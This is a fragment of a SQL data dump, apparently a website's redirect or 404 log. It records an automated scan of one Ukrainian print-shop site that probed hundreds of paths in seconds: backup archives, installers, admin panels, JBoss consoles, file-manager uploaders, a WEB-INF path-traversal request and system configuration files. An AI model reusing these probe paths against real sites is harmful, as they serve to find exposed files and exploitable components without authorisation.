00:00:00',301),(7028,'http://ekvatorprint.com.ua/includes/swfupload/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7029,'http://ekvatorprint.com.ua/includes/js/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7030,'http://ekvatorprint.com.ua/includes/swfupload/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7031,'http://ekvatorprint.com.ua/includes/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7032,'http://ekvatorprint.com.ua/includes/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7033,'http://ekvatorprint.com.ua/includes/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7034,'http://ekvatorprint.com.ua/index-test.php',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7035,'http://ekvatorprint.com.ua/includes/tinymce',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7036,'http://ekvatorprint.com.ua/incomming',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7037,'http://ekvatorprint.com.ua/index',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7038,'http://ekvatorprint.com.ua/index-bak',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7039,'http://ekvatorprint.com.ua/index.',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7040,'http://ekvatorprint.com.ua/index.001',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7041,'http://ekvatorprint.com.ua/index.000',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7042,'http://ekvatorprint.com.ua/index.bak',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7043,'http://ekvatorprint.com.ua/index.PHP',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7044,'http://ekvatorprint.com.ua/index.backup',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7045,'http://ekvatorprint.com.ua/index.7z',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7046,'http://ekvatorprint.com.ua/index.BAK',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7047,'http://ekvatorprint.com.ua/index.bz2',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7048,'http://ekvatorprint.com.ua/index.gz',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7049,'http://ekvatorprint.com.ua/index.cs',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7050,'http://ekvatorprint.com.ua/index.class',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7051,'http://ekvatorprint.com.ua/index.old',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7052,'http://ekvatorprint.com.ua/index.inc',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7053,'http://ekvatorprint.com.ua/index.java',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7054,'http://ekvatorprint.com.ua/index.orig',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7055,'http://ekvatorprint.com.ua/index.html',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7056,'http://ekvatorprint.com.ua/index.jsp',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7057,'http://ekvatorprint.com.ua/index.php/login/',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 00:00:00',301),(7058,'http://ekvatorprint.com.ua/index.tar.bz2',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7059,'http://ekvatorprint.com.ua/index.tgz',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7060,'http://ekvatorprint.com.ua/index.temp',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7061,'http://ekvatorprint.com.ua/index.rar',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7062,'http://ekvatorprint.com.ua/index.shtml',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7063,'http://ekvatorprint.com.ua/index.tmp',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7064,'http://ekvatorprint.com.ua/index.tar.gz',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7065,'http://ekvatorprint.com.ua/index.save',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7066,'http://ekvatorprint.com.ua/index.vb',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7067,'http://ekvatorprint.com.ua/index.xml',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7068,'http://ekvatorprint.com.ua/index.zip',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7069,'http://ekvatorprint.com.ua/index1.bak',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7070,'http://ekvatorprint.com.ua/index1.htm',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7071,'http://ekvatorprint.com.ua/index2.bak',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7072,'http://ekvatorprint.com.ua/index_admin.php',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7073,'http://ekvatorprint.com.ua/index_admin.',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7074,'http://ekvatorprint.com.ua/index_files',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7075,'http://ekvatorprint.com.ua/index2',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7076,'http://ekvatorprint.com.ua/index~1',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7077,'http://ekvatorprint.com.ua/index~',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7078,'http://ekvatorprint.com.ua/info',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7079,'http://ekvatorprint.com.ua/info.',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7080,'http://ekvatorprint.com.ua/install',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7081,'http://ekvatorprint.com.ua/info.json',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7082,'http://ekvatorprint.com.ua/info.txt',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7083,'http://ekvatorprint.com.ua/ini',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7084,'http://ekvatorprint.com.ua/install.asp',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7085,'http://ekvatorprint.com.ua/instadmin/',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7086,'http://ekvatorprint.com.ua/install.bak',NULL,'','',1,0,'2017-01-20 13:28:34','0000-00-00 00:00:00',301),(7087,'http://ekvatorprint.com.ua/install.aspx',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7088,'http://ekvatorprint.com.ua/install.htm',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7089,'http://ekvatorprint.com.ua/install.html',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7090,'http://ekvatorprint.com.ua/install.inc',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7091,'http://ekvatorprint.com.ua/install.pgsql.txt',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7092,'http://ekvatorprint.com.ua/install.mysql.txt',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7093,'http://ekvatorprint.com.ua/install.md',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7094,'http://ekvatorprint.com.ua/install.sql',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7095,'http://ekvatorprint.com.ua/install.rdf',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7096,'http://ekvatorprint.com.ua/install.php',NULL,'','',2,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7097,'http://ekvatorprint.com.ua/install.log',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7098,'http://ekvatorprint.com.ua/install.tpl',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7099,'http://ekvatorprint.com.ua/install.txt',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7100,'http://ekvatorprint.com.ua/install/update.log',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7101,'http://ekvatorprint.com.ua/install/',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7102,'http://ekvatorprint.com.ua/installation',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7103,'http://ekvatorprint.com.ua/install_',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7104,'http://ekvatorprint.com.ua/installation.html',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7105,'http://ekvatorprint.com.ua/installation.htm',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7106,'http://ekvatorprint.com.ua/installation.php',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7107,'http://ekvatorprint.com.ua/installation.md',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7108,'http://ekvatorprint.com.ua/installation/',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7109,'http://ekvatorprint.com.ua/installer',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7110,'http://ekvatorprint.com.ua/install~/',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7111,'http://ekvatorprint.com.ua/internal',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7112,'http://ekvatorprint.com.ua/interadmin',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7113,'http://ekvatorprint.com.ua/international',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7114,'http://ekvatorprint.com.ua/intro',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7115,'http://ekvatorprint.com.ua/intranet',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7116,'http://ekvatorprint.com.ua/internet',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7117,'http://ekvatorprint.com.ua/invisimail',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7118,'http://ekvatorprint.com.ua/invoker',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7119,'http://ekvatorprint.com.ua/invoker/JMXInvokerServlet',NULL,'','',1,0,'2017-01-20 13:28:35','0000-00-00 00:00:00',301),(7120,'http://ekvatorprint.com.ua/ip.txt',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7121,'http://ekvatorprint.com.ua/ispmgr/',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7122,'http://ekvatorprint.com.ua/isapi/',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7123,'http://ekvatorprint.com.ua/iredadmin',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7124,'http://ekvatorprint.com.ua/ip_configs/',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7125,'http://ekvatorprint.com.ua/iradmin',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7126,'http://ekvatorprint.com.ua/is-bin/',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7127,'http://ekvatorprint.com.ua/iso_admin',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7128,'http://ekvatorprint.com.ua/isadmin',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7129,'http://ekvatorprint.com.ua/issues',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7130,'http://ekvatorprint.com.ua/it',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7131,'http://ekvatorprint.com.ua/ivt/ivtservlet',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7132,'http://ekvatorprint.com.ua/ivt',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7133,'http://ekvatorprint.com.ua/ivt/ivtejb',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7134,'http://ekvatorprint.com.ua/ivtejb',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7135,'http://ekvatorprint.com.ua/ivt/',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7136,'http://ekvatorprint.com.ua/ivt/ivtDate.jsp',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7137,'http://ekvatorprint.com.ua/ivt/ivtservler',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7138,'http://ekvatorprint.com.ua/ivtserver',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7139,'http://ekvatorprint.com.ua/ivtservlet',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7140,'http://ekvatorprint.com.ua/j',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7141,'http://ekvatorprint.com.ua/j2ee',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7142,'http://ekvatorprint.com.ua/j_security_check',NULL,'','',1,0,'2017-01-20 13:28:36','0000-00-00 00:00:00',301),(7143,'http://ekvatorprint.com.ua/java-sys/',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7144,'http://ekvatorprint.com.ua/javascript/editors/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7145,'http://ekvatorprint.com.ua/java',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7146,'http://ekvatorprint.com.ua/javascript/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7147,'http://ekvatorprint.com.ua/javascript',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7148,'http://ekvatorprint.com.ua/javax.faces.resource.../WEB-INF/web.xml.jsf',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7149,'http://ekvatorprint.com.ua/jcadmin',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7150,'http://ekvatorprint.com.ua/jira/',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7151,'http://ekvatorprint.com.ua/jmssender',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7152,'http://ekvatorprint.com.ua/jdbc',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7153,'http://ekvatorprint.com.ua/jmstrader',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7154,'http://ekvatorprint.com.ua/jmx-console',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7155,'http://ekvatorprint.com.ua/jmx-console/HtmlAdaptor',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7156,'http://ekvatorprint.com.ua/jmx-console/',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7157,'http://ekvatorprint.com.ua/jo.php',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7158,'http://ekvatorprint.com.ua/jobadmin',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7159,'http://ekvatorprint.com.ua/jobs',NULL,'','',2,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7160,'http://ekvatorprint.com.ua/joomla',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7161,'http://ekvatorprint.com.ua/joomla.rar',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7162,'http://ekvatorprint.com.ua/join',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7163,'http://ekvatorprint.com.ua/joomla.zip',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7164,'http://ekvatorprint.com.ua/joomla/administrator',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7165,'http://ekvatorprint.com.ua/js/FCKeditor',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7166,'http://ekvatorprint.com.ua/js/elfinder/elfinder.php',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7167,'http://ekvatorprint.com.ua/js',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7168,'http://ekvatorprint.com.ua/js/swfupload/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7169,'http://ekvatorprint.com.ua/js/swfupload/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7170,'http://ekvatorprint.com.ua/js/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7171,'http://ekvatorprint.com.ua/js/tinymce',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7172,'http://ekvatorprint.com.ua/js/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7173,'http://ekvatorprint.com.ua/js/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:37','0000-00-00 00:00:00',301),(7174,'http://ekvatorprint.com.ua/js/yui/uploader/assets/uploader.swf',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7175,'http://ekvatorprint.com.ua/jscripts/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7176,'http://ekvatorprint.com.ua/jscripts',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7177,'http://ekvatorprint.com.ua/jscripts/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7178,'http://ekvatorprint.com.ua/json',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7179,'http://ekvatorprint.com.ua/jsp/extension/login.jsp',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7180,'http://ekvatorprint.com.ua/jssresource/',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7181,'http://ekvatorprint.com.ua/jsp',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7182,'http://ekvatorprint.com.ua/jscripts/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7183,'http://ekvatorprint.com.ua/jscripts/tinymce',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7184,'http://ekvatorprint.com.ua/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7185,'http://ekvatorprint.com.ua/jsp-examples/',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7186,'http://ekvatorprint.com.ua/jspbuild',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7187,'http://ekvatorprint.com.ua/jwsdir',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7188,'http://ekvatorprint.com.ua/k',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7189,'http://ekvatorprint.com.ua/kcfinder/browse.php',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7190,'http://ekvatorprint.com.ua/keygen',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7191,'http://ekvatorprint.com.ua/kadmin',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7192,'http://ekvatorprint.com.ua/killer.php',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7193,'http://ekvatorprint.com.ua/keyadmin',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7194,'http://ekvatorprint.com.ua/kontakt',NULL,'','',3,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7195,'http://ekvatorprint.com.ua/l',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7196,'http://ekvatorprint.com.ua/kmitaadmin',NULL,'','',1,0,'2017-01-20 13:28:38','0000-00-00 00:00:00',301),(7197,'http://ekvatorprint.com.ua/l-admin',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7198,'http://ekvatorprint.com.ua/l.',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7199,'http://ekvatorprint.com.ua/l.php',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7200,'http://ekvatorprint.com.ua/l0gs.txt',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7201,'http://ekvatorprint.com.ua/labels.rdf',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7202,'http://ekvatorprint.com.ua/lang',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7203,'http://ekvatorprint.com.ua/lander.logs',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7204,'http://ekvatorprint.com.ua/ladmin',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7205,'http://ekvatorprint.com.ua/lang/web.config',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7206,'http://ekvatorprint.com.ua/latest',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7207,'http://ekvatorprint.com.ua/languages',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7208,'http://ekvatorprint.com.ua/legal',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7209,'http://ekvatorprint.com.ua/lbadmin',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7210,'http://ekvatorprint.com.ua/lemardel_admin',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7211,'http://ekvatorprint.com.ua/lib',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7212,'http://ekvatorprint.com.ua/lib/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7213,'http://ekvatorprint.com.ua/lg',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7214,'http://ekvatorprint.com.ua/lfc/fixtures/superuser.xml',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7215,'http://ekvatorprint.com.ua/lesson_admin',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7216,'http://ekvatorprint.com.ua/lib/flex/uploader/.flexProperties',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7217,'http://ekvatorprint.com.ua/lib/flex/uploader/.actionScriptProperties',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7218,'http://ekvatorprint.com.ua/lib/fckeditor/',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7219,'http://ekvatorprint.com.ua/lib/flex/uploader/.project',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7220,'http://ekvatorprint.com.ua/lib/flex/uploader/.settings',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7221,'http://ekvatorprint.com.ua/lib/flex/varien/.flexLibProperties',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7222,'http://ekvatorprint.com.ua/lib/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7223,'http://ekvatorprint.com.ua/lib/flex/varien/.actionScriptProperties',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7224,'http://ekvatorprint.com.ua/lib/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7225,'http://ekvatorprint.com.ua/lib/flex/varien/.project',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7226,'http://ekvatorprint.com.ua/lib/tinymce',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7227,'http://ekvatorprint.com.ua/lib/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7228,'http://ekvatorprint.com.ua/lib/flex/varien/.settings',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7229,'http://ekvatorprint.com.ua/libraries/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7230,'http://ekvatorprint.com.ua/libraries/phpmailer/',NULL,'','',1,0,'2017-01-20 13:28:39','0000-00-00 00:00:00',301),(7231,'http://ekvatorprint.com.ua/libraries/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7232,'http://ekvatorprint.com.ua/libraries/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7233,'http://ekvatorprint.com.ua/library',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7234,'http://ekvatorprint.com.ua/lilo.conf',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7235,'http://ekvatorprint.com.ua/libraries/tinymce',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7236,'http://ekvatorprint.com.ua/linkadmin.php',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7237,'http://ekvatorprint.com.ua/libs',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7238,'http://ekvatorprint.com.ua/link',NULL,'','',2,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7239,'http://ekvatorprint.com.ua/license.txt',NULL,'','',13,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7240,'http://ekvatorprint.com.ua/linkadmin.',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7241,'http://ekvatorprint.com.ua/linkhub/linkhub.log',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7242,'http://ekvatorprint.com.ua/links',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7243,'http://ekvatorprint.com.ua/list',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7244,'http://ekvatorprint.com.ua/listadmin',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7245,'http://ekvatorprint.com.ua/linusadmin-phpinfo.php',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7246,'http://ekvatorprint.com.ua/linux',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7247,'http://ekvatorprint.com.ua/linktous.html',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7248,'http://ekvatorprint.com.ua/list_emails',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7249,'http://ekvatorprint.com.ua/linksadmin',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7250,'http://ekvatorprint.com.ua/listinfo',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 00:00:00',301),(7251,'http://ekvatorprint.com.ua/lists',NULL,'','',1,0,'2017-01-20 13:28:40','0000-00-00 